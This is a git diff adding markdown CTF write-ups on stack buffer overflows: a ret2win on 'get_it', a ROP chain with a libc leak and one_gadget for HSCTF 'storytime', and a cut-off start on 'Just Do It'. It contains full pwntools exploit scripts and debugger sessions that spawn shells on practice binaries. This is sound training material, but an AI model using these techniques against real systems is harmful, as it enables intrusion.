+ get_it: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=87529a0af36e617a1cc6b9f53001fdb88a9262a2, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/getit]
+ → chmod +x get_it
+
+
+` ![]()
+
+## Solution
+
+first we start by executing the binary to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → ./get_it
+ Do you gets it??
+ maybe
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → ./get_it
+ Do you gets it??
+ yes
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → pwn checksec get_it
+ [*] '/home/nothing/binexp/2/get/get_it'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+
+It prints text, and then asks for our input. This is a 64 bit binary with a non-executable stack. Let's check it from inside ghidra:
+
+
+
+The binary really has a simplistic code for the main function:
+
+
+ undefined8 main(void)
+
+ {
+ char local_28 [32];
+
+ puts("Do you gets it??");
+ gets(local_28);
+ return 0;
+ }
+
+
+
+So our input text is given to the local_28 variable which can hold 32 characters, and it is being passed through a gets function, and as we saw in the previous binary, the gets function is not secure because it does not know a limit, there is no size restriction for the data that gets scanned in, it will simply scan in data until it gets either a newline character or an EOF. Because of this we can write more data to our input text variable (local_28) than it can hold.
+
+Looking at the other functions of this binary, we see that there is another function that's there to spawn a shell for us:
+
+
+
+
+ void give_shell(void)
+
+ {
+ system("/bin/bash");
+ return;
+ }
+
+
+From here it's safe to assume that the goal is to find a way to spawn a shell thanks to the give_shell function. Since we know the gets function does not have an upper limit, so our goal is to overwrite the return function at the end, so that we can do what we want with it:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/2 ] [binexp/2/get]
+ → gdb ./get_it
+ GNU gdb (Debian 10.1-1.7) 10.1.90.20210103-git
+ Copyright (C) 2021 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1.90.20210103-git using Python engine 3.9
+ Reading symbols from ./get_it...
+ (No debugging symbols found in ./get_it)
+ gef➤ disas main
+ Dump of assembler code for function main:
+ 0x00000000004005c7 <+0>: push rbp
+ 0x00000000004005c8 <+1>: mov rbp,rsp
+ 0x00000000004005cb <+4>: sub rsp,0x30
+ 0x00000000004005cf <+8>: mov DWORD PTR [rbp-0x24],edi
+ 0x00000000004005d2 <+11>: mov QWORD PTR [rbp-0x30],rsi
+ 0x00000000004005d6 <+15>: mov edi,0x40068e
+ 0x00000000004005db <+20>: call 0x400470
+ 0x00000000004005e0 <+25>: lea rax,[rbp-0x20]
+ 0x00000000004005e4 <+29>: mov rdi,rax
+ 0x00000000004005e7 <+32>: mov eax,0x0
+ 0x00000000004005ec <+37>: call 0x4004a0
+ 0x00000000004005f1 <+42>: mov eax,0x0
+ 0x00000000004005f6 <+47>: leave
+ 0x00000000004005f7 <+48>: ret
+ End of assembler dump.
+ gef➤ b *0x4005f1
+ Breakpoint 1 at 0x4005f1
+ gef➤ r
+
+
+Here we set our first breakpoint right after the gets call, so let's run the binary and give it a pattern easy to remember:
+
+
+
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/get/get_it
+ Do you gets it??
+ 13371337
+
+ Breakpoint 1, 0x00000000004005f1 in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x00007fffffffe0e0 → "13371337"
+ $rbx : 0x0
+ $rcx : 0x00007ffff7fac980 → 0x00000000fbad2288
+ $rdx : 0x0
+ $rsp : 0x00007fffffffe0d0 → 0x00007fffffffe1f8 → 0x00007fffffffe4de → "/home/nothing/binexp/2/get/get_it"
+ $rbp : 0x00007fffffffe100 → 0x0000000000400600 → <__libc_csu_init+0> push r15
+ $rsi : 0x31373333
+ $rdi : 0x00007ffff7faf680 → 0x0000000000000000
+ $rip : 0x00000000004005f1 → mov eax, 0x0
+ $r8 : 0x00007fffffffe0e0 → "13371337"
+ $r9 : 0x0
+ $r10 : 0x6e
+ $r11 : 0x246
+ $r12 : 0x00000000004004c0 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero carry parity adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffe0d0│+0x0000: 0x00007fffffffe1f8 → 0x00007fffffffe4de → "/home/nothing/binexp/2/get/get_it" ← $rsp
+ 0x00007fffffffe0d8│+0x0008: 0x0000000100000000
+ 0x00007fffffffe0e0│+0x0010: "13371337" ← $rax, $r8
+ 0x00007fffffffe0e8│+0x0018: 0x0000000000400400 → add BYTE PTR [rax], al
+ 0x00007fffffffe0f0│+0x0020: 0x00007fffffffe1f0 → 0x0000000000000001
+ 0x00007fffffffe0f8│+0x0028: 0x0000000000000000
+ 0x00007fffffffe100│+0x0030: 0x0000000000400600 → <__libc_csu_init+0> push r15 ← $rbp
+ 0x00007fffffffe108│+0x0038: 0x00007ffff7e14d0a → <__libc_start_main+234> mov edi, eax
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x4005e4 mov rdi, rax
+ 0x4005e7 mov eax, 0x0
+ 0x4005ec call 0x4004a0
+ ●→ 0x4005f1 mov eax, 0x0
+ 0x4005f6 leave
+ 0x4005f7 ret
+ 0x4005f8 nop DWORD PTR [rax+rax*1+0x0]
+ 0x400600 <__libc_csu_init+0> push r15
+ 0x400602 <__libc_csu_init+2> push r14
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "get_it", stopped 0x4005f1 in main (), reason: BREAKPOINT
+ ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x4005f1 → main()
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+
+
+no need to search for the pattern, we see that our pattern appears at $rax ( 0x00007fffffffe0e0 )
+
+
+ gef➤ i f
+ Stack level 0, frame at 0x7fffffffe110:
+ rip = 0x4005f1 in main; saved rip = 0x7ffff7e14d0a
+ Arglist at 0x7fffffffe100, args:
+ Locals at 0x7fffffffe100, Previous frame's sp is 0x7fffffffe110
+ Saved registers:
+ rbp at 0x7fffffffe100, rip at 0x7fffffffe108
+
+
+
+here we see that the return address is stored at 0x7fffffffe108, lets verify that our pattern is at the address we found above:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[heap]'(0x602000-0x623000), permission=rw-
+ 0x6026b0 - 0x6026ba → "13371337\n"
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffe0e0 - 0x7fffffffe0e8 → "13371337"
+
+
+and it is! now we need to calculate the offset between 0x00007fffffffe0e0 and 0x7fffffffe108
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/get]
+ → python3
+ Python 3.9.1+ (default, Feb 5 2021, 13:46:56)
+ [GCC 10.2.1 20210110] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffe0e0 - 0x7fffffffe108 )
+ '-0x28'
+
+
+So we get a 0x28 byte offset which is 40 bytes in decimal, basically we need to write 40 bytes worth of input, and then we can write over the return address. Tis address will be executed when the ret instruction is executed, which will give us code execution. We need the address of the give_shell function which we get from ghidra:
+
+
+ **************************************************************
+ * FUNCTION *
+ **************************************************************
+ undefined give_shell()
+ undefined AL:1
+ give_shell XREF[3]: Entry Point(*), 004006bc,
+ 00400758(*)
+ 004005b6 55 PUSH RBP
+
+
+
+now that we know that we need 40 bytes of input, and then the address 0x004005b6, we can create our payload:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/get]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+ import sys
+
+ target = process("./get_it")
+
+ payload = b""
+ payload += b"\x00" * 0x28
+ payload += p64(0x4005b6)
+
+
+ target.sendline(payload)
+
+ target.interactive()
+
+
+
+
+Basically with this exploit.py we create a payload that has 40 nullbytes (0x28 in hexa) and then contains the address of the give_shell function, so let's see if it works:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/get]
+ → python3 exploit.py
+ [+] Starting local process './get_it': pid 244402
+ [*] Switching to interactive mode
+ Do you gets it??
+ $ w
+ 21:07:19 up 1 day, 22:20, 3 users, load average: 0.16, 0.14, 0.06
+ USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+ nothing pts/1 tmux(6724).%3 16:42 6.00s 18.38s 0.15s python3 exploit.py
+ nothing pts/3 tmux(6724).%4 19:14 45:07 0.88s 0.04s less
+ nothing pts/4 tmux(6724).%5 19:21 3:35 2.46s 2.46s -zsh
+
+
+
+and that's it! we have been able to spawn a shell with the binary file.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/hs.md b/2/hs.md
new file mode 100644
index 0000000..cd8012d
--- /dev/null
+++ b/2/hs.md
@@ -0,0 +1,389 @@
+# Binary Exploitation
+
+## Downloading the binary file
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/hs19_storytime/core
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/hs19_storytime/libc.so.6
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → wget -q https://github.com/guyinatuxedo/nightmare/raw/master/modules/08-bof_dynamic/hs19_storytime/storytime
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → file storytime
+ storytime: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=3f716e7aa7e236824c52ed0410c1f14739919822, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → chmod +x storytime ; ls -lash
+ total 4.1M
+ 4.0K drwxr-xr-x 2 nothing nothing 4.0K Mar 7 10:27 .
+ 4.0K drwxr-xr-x 13 nothing nothing 4.0K Mar 7 10:26 ..
+ 2.3M -rw-r--r-- 1 nothing nothing 2.3M Mar 7 10:26 core
+ 1.8M -rw-r--r-- 1 nothing nothing 1.8M Mar 7 10:27 libc.so.6
+ 12K -rwxr-xr-x 1 nothing nothing 8.3K Mar 7 10:27 storytime
+
+
+
+` ![]()
+
+## Solution
+
+First of all let's run pwn checksec on the binary and then run it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → pwn checksec storytime
+ [*] '/home/nothing/binexp/2/hs/storytime'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x400000)
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → ./storytime
+ HSCTF PWNNNNNNNNNNNNNNNNNNNN
+ Tell me a story:
+ yes
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → ./storytime
+ HSCTF PWNNNNNNNNNNNNNNNNNNNN
+ Tell me a story:
+ no
+
+
+
+So we have a 64 bit dynamically linked binary that has a Non-Executable stack (NX), it prints out some text, and then prompts us for input. Let's view it inside of ghidra:
+
+
+
+We get the following disassembled code:
+
+
+ undefined8 main(void)
+
+ {
+ undefined local_38 [48];
+
+ setvbuf(stdout,(char *)0x0,2,0);
+ write(1,"HSCTF PWNNNNNNNNNNNNNNNNNNNN\n",0x1d);
+ write(1,"Tell me a story: \n",0x12);
+ read(0,local_38,400);
+ return 0;
+ }
+
+
+
+Our input text gets passed into a read() call, and we can pass in 400 bytes of data into the local_38 variable even though it was initially declared to be able to hold only 48 bytes. So this means that we have our buffer overflow right here. There is no stack canary, so nothing stops us from executing code, now what will we execute ? When we look under the imports in Ghidra, we see the following imported functions:
+
+
+
+So this means that we can call any of these functions, Since the ELF is dynamically linked, we don't have alot of gadgets. First we will need to get a libc infoleak with a **write** function that writes to stdout (1) and then loops back again to a vulnerable read call to overwrite the return address with a [onegadget](https://github.com/david942j/one_gadget), which is a ROP gadget that can be found in the libc, that can potentially spawn a shell. Now we need to know what the libc version is, we can view it from gdb with the **vmmap** command.
+
+
+
+Here we want to set the first breakpoint after the read call at **0x4x4x4x40069c** , so we can locate where our text is:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/2/hs]
+ → gdb ./storytime
+ GNU gdb (GDB) 10.1
+ Copyright (C) 2020 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-pc-linux-gnu".
+ Type "show configuration" for configuration details.
+ For bug reporting instructions, please see:
+ .
+ Find the GDB manual and other documentation resources online at:
+ .
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ GEF for linux ready, type `gef' to start, `gef config' to configure
+ 92 commands loaded for GDB 10.1 using Python engine 3.9
+ Reading symbols from ./storytime...
+ (No debugging symbols found in ./storytime)
+ gef➤ b *0x40069c
+ Breakpoint 1 at 0x40069c
+ gef➤ r
+ Starting program: /home/nothing/binexp/2/hs/storytime
+ HSCTF PWNNNNNNNNNNNNNNNNNNNN
+ Tell me a story:
+ 13371337
+
+ Breakpoint 1, 0x000000000040069c in main ()
+ [ Legend: Modified register | Code | Heap | Stack | String ]
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
+ $rax : 0x0
+ $rbx : 0x00000000004006a0 → <__libc_csu_init+0> push r15
+ $rcx : 0x00007ffff7ebd052 → 0x5677fffff0003d48 ("H="?)
+ $rdx : 0x190
+ $rsp : 0x00007fffffffdf38 → 0x00007ffff7df4b25 → <__libc_start_main+213> mov edi, eax
+ $rbp : 0x0
+ $rsi : 0x00007fffffffdf00 → 0x3733333137333331 ("13371337"?)
+ $rdi : 0x0
+ $rip : 0x000000000040069c → ret
+ $r8 : 0x0
+ $r9 : 0x00007ffff7fdc070 → <_dl_fini+0> endbr64
+ $r10 : 0xfffffffffffffb87
+ $r11 : 0x246
+ $r12 : 0x00000000004004d0 → <_start+0> xor ebp, ebp
+ $r13 : 0x0
+ $r14 : 0x0
+ $r15 : 0x0
+ $eflags: [zero CARRY PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
+ $cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
+ 0x00007fffffffdf38│+0x0000: 0x00007ffff7df4b25 → <__libc_start_main+213> mov edi, eax ← $rsp
+ 0x00007fffffffdf40│+0x0008: 0x00007fffffffe028 → 0x00007fffffffe358 → "/home/nothing/binexp/2/hs/storytime"
+ 0x00007fffffffdf48│+0x0010: 0x00000001f7fca000
+ 0x00007fffffffdf50│+0x0018: 0x000000000040062e → push rbp
+ 0x00007fffffffdf58│+0x0020: 0x00007fffffffe339 → 0x61b7180f2454c920
+ 0x00007fffffffdf60│+0x0028: 0x00000000004006a0 → <__libc_csu_init+0> push r15
+ 0x00007fffffffdf68│+0x0030: 0x7140ad8a61b88017
+ 0x00007fffffffdf70│+0x0038: 0x00000000004004d0 → <_start+0> xor ebp, ebp
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
+ 0x400691 call 0x4004b0
+ 0x400696 mov eax, 0x0
+ 0x40069b leave
+ ●→ 0x40069c ret
+ ↳ 0x7ffff7df4b25 <__libc_start_main+213> mov edi, eax
+ 0x7ffff7df4b27 <__libc_start_main+215> call 0x7ffff7e0c820
+ 0x7ffff7df4b2c <__libc_start_main+220> mov rax, QWORD PTR [rsp]
+ 0x7ffff7df4b30 <__libc_start_main+224> lea rdi, [rip+0x164729] # 0x7ffff7f59260
+ 0x7ffff7df4b37 <__libc_start_main+231> mov rsi, QWORD PTR [rax]
+ 0x7ffff7df4b3a <__libc_start_main+234> xor eax, eax
+ ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
+ [#0] Id 1, Name: "storytime", stopped 0x40069c in main (), reason: BREAKPOINT
+ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
+ [#0] 0x40069c → main()
+ ─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ gef➤
+
+
+
+What happened here is that we first set the breakpoint to be after the read call, and then we ran the binary, gave it an easy to remember pattern (13371337) and then we hit our breakpoint. Now let's search where our pattern is in the memory:
+
+
+ gef➤ search-pattern 13371337
+ [+] Searching '13371337' in memory
+ [+] In '[stack]'(0x7ffffffde000-0x7ffffffff000), permission=rw-
+ 0x7fffffffdf00 - 0x7fffffffdf08 → "13371337[...]"
+
+ gef➤ info frame
+ Stack level 0, frame at 0x7fffffffdf38:
+ rip = 0x40069c in main; saved rip = 0x7ffff7df4b25
+ Arglist at unknown address.
+ Locals at unknown address, Previous frame's sp is 0x7fffffffdf40
+ Saved registers:
+ rip at 0x7fffffffdf38
+
+
+
+So here we see that our pattern is located at **0x7fffffffdf00** and the return address is at **0x7fffffffdf38** so we can now calculate the offset between the 2 with python's hex() function easily:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [Nextcloud/blog]
+ → python3
+ Python 3.9.2 (default, Feb 20 2021, 18:40:11)
+ [GCC 10.2.0] on linux
+ Type "help", "copyright", "credits" or "license" for more information.
+ >>> hex( 0x7fffffffdf00 - 0x7fffffffdf38 )
+ '-0x38'
+
+
+
+And we get a 0x38 bytes offset between the start of our input and the return address. Now for the write libc infoleak, we need to make use of the following registers:
+
+
+ rdi 0x1 (stdout file handle)
+ rsi got address entry for write
+ rdx value => 8
+
+
+
+Since PIE isn't enabled, we know the address of the got entry without needing a PIE infoleak. Looking at the assembly code leading up to the ret instruction which gives us code execution, we can see that the **rdx** register is set to 0x190 whgich will fit our needs:
+
+
+ 00400680 48 8d 45 d0 LEA RAX=>local_38,[RBP + -0x30]
+ 00400684 ba 90 01 MOV EDX,0x190
+ 00 00
+ 00400689 48 89 c6 MOV RSI,RAX
+ 0040068c bf 00 00 MOV EDI,0x0
+ 00 00
+ 00400691 e8 1a fe CALL read ssize_t read(int __fd, void * __
+
+
+
+Now for the got entry of **write** in the rsi register, we see that there is a rop gadget that will allow us to pop it into the register. It will also pop a value into the r15 register, however we just need to include another 8 byte qword in our rop chain for that so it doesn't change anything:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → ROPgadget --binary storytime| grep rsi
+ 0x0000000000400701 : pop rsi ; pop r15 ; ret
+
+
+
+Now for the last register (1 in rdi) we can jump to 0x400601 which is in the middle of the end function:
+
+
+ void end(void)
+
+ {
+ write(1,"The End!\n",0x28);
+ return;
+ }
+
+
+
+The instruction we jump back to will **mov 0x1 into edi** and then call **write** which will give us our infoleak:
+
+
+ 004005fa 48 8d 35 LEA RSI,[s_The_End!_00400761] = "The End!\n"
+ 60 01 00 00
+ 00400601 bf 01 00 MOV EDI,0x1
+ 00 00
+ 00400606 e8 95 fe CALL write ssize_t write(int __fd, void * _
+ ff ff
+ 0040060b 90 NOP
+ 0040060c 5d POP RBP
+ 0040060d c3 RET
+
+
+
+So it will return and then continue with our ropchain, however before it does that, it will pop a value off of our chain into the rbp register so we will need to include a 8 bytes qword in our ropchain at that point. for where to jump to, we choose **0x40060e** since it is the beginning of the **climax** function:
+
+
+
+
+ void climax(void)
+
+ {
+ undefined local_38 [48];
+
+ read(0,local_38,4000);
+ return;
+ }
+
+
+
+This function will give us a buffer overflow where we can overwrite the return address with a onegadget and spawn a shell. Now let's find the onegadget from the base of libc, to choose which ones to use we can just guess and check
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → one_gadget libc.so.6
+ 0x45216 execve("/bin/sh", rsp+0x30, environ)
+ constraints:
+ rax == NULL
+
+ 0x4526a execve("/bin/sh", rsp+0x30, environ)
+ constraints:
+ [rsp+0x30] == NULL
+
+ 0xf02a4 execve("/bin/sh", rsp+0x50, environ)
+ constraints:
+ [rsp+0x50] == NULL
+
+ 0xf1147 execve("/bin/sh", rsp+0x70, environ)
+ constraints:
+ [rsp+0x70] == NULL
+
+
+
+So with all of this, we end up with the following exploit:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → vim exploit.py
+
+
+
+
+ from pwn import *
+
+ target = process('./storytime')
+ libc = ELF('libc.so.6')
+
+ popRsiR15 = p64(0x400701)
+ writeGot = p64(0x601018)
+ payload = b"\x00"*0x38
+
+ # Pop the got entry of write into r15
+ payload += popRsiR15
+ payload += writeGot
+ payload += p64(0x3030303030303030) # Filler value will be popped into r15
+
+ # Right before write call in end
+ payload += p64(0x400601)
+
+ # Filler value that will be popped off in end
+ payload += p64(0x3030303030303030)
+
+ # Address of climax, we will exploit another buffer overflow to use the rop gadget
+ payload += p64(0x40060e)
+
+ target.sendline(payload)
+ print(target.recvuntil("Tell me a story: \n"))
+
+ # Scan in and filter out the libc infoleak, calculate base of libc
+ leak = u64(target.recv(8))
+ base = leak - libc.symbols["write"]
+ print(hex(base))
+
+ # Calculate the oneshot gadget
+ oneshot = base + 0x4526a
+
+ # Make the payload for the onshot gadget
+ payload = b"\x00"*0x38 + p64(oneshot)
+
+ # Send it and get a shell
+ target.sendline(payload)
+ target.interactive()
+
+
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/17 ] [binexp/2/hs]
+ → python3 original.py
+ [+] Starting local process './storytime': pid 1570923
+ [*] '/home/nothing/binexp/2/hs/libc.so.6'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+ b'HSCTF PWNNNNNNNNNNNNNNNNNNNN\nTell me a story: \n'
+ 0x7f1b59432e30
+ [*] Switching to interactive mode
+ @\xa0RY\x1b\x7f\x00\xf0KY\x1b\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00 \xc5_Y\x1b\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0[*] Got EOF while reading in interactive
+ $ cat flag.txt
+ hsctf{th4nk7_f0r_th3_g00d_st0ry_yay-314879357}
+
+
+And that's it ! we managed to capture the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/2/just.md b/2/just.md
new file mode 100644
index 0000000..02025c3
--- /dev/null
+++ b/2/just.md
@@ -0,0 +1,272 @@
+# Tokyo Western 2017 - Just Do It!
+
+## Downloading the binary file
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tw17_justdoit/just_do_it
+ --2021-02-23 15:25:50-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/04-bof_variable/tw17_justdoit/just_do_it
+ Resolving github.com (github.com)... 140.82.121.4
+ Connecting to github.com (github.com)|140.82.121.4|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tw17_justdoit/just_do_it [following]
+ --2021-02-23 15:25:51-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/04-bof_variable/tw17_justdoit/just_do_it
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.111.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 7792 (7.6K) [application/octet-stream]
+ Saving to: ‘just_do_it’
+
+ just_do_it 100%[=======================================================================================================================================================================================================>] 7.61K --.-KB/s in 0s
+
+ 2021-02-23 15:25:51 (35.9 MB/s) - ‘just_do_it’ saved [7792/7792]
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → file just_do_it
+ just_do_it: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=cf72d1d758e59a5b9912e0e83c3af92175c6f629, not stripped
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → chmod +x just_do_it
+
+
+
+` ![]()
+
+## Solution
+
+First of all, let's run the binary file to see what it does:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → ./just_do_it
+ Welcome my secret service. Do you know the password?
+ Input the password.
+ not_the_password
+ Invalid Password, Try Again!
+
+
+
+Again, this is the kind of binary files that wants us to give them the correct password, so it's time to checksec it and see what ghidra finds:
+
+
+ [ 192.168.100.126/24 ] [ /dev/pts/1 ] [binexp/2/justdoit]
+ → pwn checksec just_do_it
+ [*] '/home/nothing/binexp/2/justdoit/just_do_it'
+ Arch: i386-32-little
+ RELRO: Partial RELRO
+ Stack: No canary found
+ NX: NX enabled
+ PIE: No PIE (0x8048000)
+
+
+
+` 
+
+
+ undefined4 main(void)
+
+ {
+ char *pcVar1;
+ int iVar2;
+ char local_28 [16];
+ FILE *local_18;
+ char *local_14;
+ undefined *local_c;
+
+ local_c = &stack0x00000004;
+ setvbuf(stdin,(char *)0x0,2,0);
+ setvbuf(stdout,(char *)0x0,2,0);
+ setvbuf(stderr,(char *)0x0,2,0);
+ local_14 = failed_message;
+ local_18 = fopen("flag.txt","r");
+ if (local_18 == (FILE *)0x0) {
+ perror("file open error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ pcVar1 = fgets(flag,0x30,local_18);
+ if (pcVar1 == (char *)0x0) {
+ perror("file read error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ puts("Welcome my secret service. Do you know the password?");
+ puts("Input the password.");
+ pcVar1 = fgets(local_28,0x20,stdin);
+ if (pcVar1 == (char *)0x0) {
+ perror("input error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+ }
+ iVar2 = strcmp(local_28,PASSWORD);
+ if (iVar2 == 0) {
+ local_14 = success_message;
+ }
+ puts(local_14);
+ return 0;
+ }
+
+
+here we have the code of the main function and we see something: first of all it checks if flag.txt is here, and then it prompts for our text input, putting it in the local_28 variable, and then later on, our input text (local_28) gets compared to the PASSWORD variable, so let's double click it in ghidra to see what it contains:
+
+
+
+
+ PASSWORD XREF[2]: Entry Point(*), main:080486d0(R)
+ 0804a03c c8 87 04 08 addr s_P@SSW0RD_080487c8 = "P@SSW0RD"
+
+
+
+now in the code we see something particular:
+
+
+ pcVar1 = fgets(local_28,0x20,stdin);
+ if (pcVar1 == (char *)0x0) {
+ perror("input error.\n");
+ /* WARNING: Subroutine does not return */
+ exit(0);
+
+
+
